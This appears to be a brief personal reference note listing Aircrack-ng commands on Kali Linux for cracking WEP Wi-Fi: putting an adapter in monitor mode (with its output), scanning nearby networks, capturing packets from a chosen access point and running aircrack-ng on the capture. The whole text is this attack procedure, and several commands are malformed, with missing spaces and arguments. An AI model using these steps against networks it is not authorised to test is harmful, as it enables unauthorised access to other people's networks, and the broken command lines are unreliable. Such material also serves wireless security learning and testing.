There are more than enough Aircrack-ng tutorial on the web. I just put down the command to use for later reference here
Start wlan0 monitor mode
root@kali:~# airmon-ng start wlan0 Found 4 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 2188 dhclient 2287 NetworkManager 3152 wpa_supplicant 3177 dhclient PHY Interface Driver Chipset phy0 wlan0 ath9k_htc Atheros Communications, Inc. AR9271 802.11n (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0) root@kali:~#
Looking at which WIFI in your area
root@kali:~# airodump-ng wlan0mon RESULT NOT SHOWN HERE, IT EXPOSES MY LOCATION INFORMATION
Mark down the BSSID, Channel and ESSID, in particular, only WEP can be cracked.
airodump-ng --channel--bssid 00:09:5B:D7:43:A8 --write
You will get a bunch of files, we are only interested in the “cap” file
sudo aircrack-ng.cap
DONE….